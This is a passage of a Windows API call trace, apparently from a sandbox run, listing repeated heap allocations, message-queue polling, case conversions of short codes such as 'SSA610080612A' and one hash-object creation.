0x24b1468 [0266.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0266.234] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0266.235] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.235] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0266.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0266.235] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.235] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.235] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.235] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0266.235] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0266.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.236] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0266.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0266.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.236] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0266.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.237] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.237] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.237] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0266.237] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.237] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0266.237] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.237] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0266.238] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.238] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.238] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.238] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.238] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.238] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.239] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.239] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0266.239] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.239] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0266.239] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.239] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.239] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.239] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0266.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0266.240] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.240] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.240] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.240] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.241] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.241] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0266.241] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.241] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0266.241] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.241] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.242] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.242] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0266.243] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.243] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.243] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.243] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.244] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0266.244] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.245] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.245] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.245] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0266.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.246] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.246] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.246] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 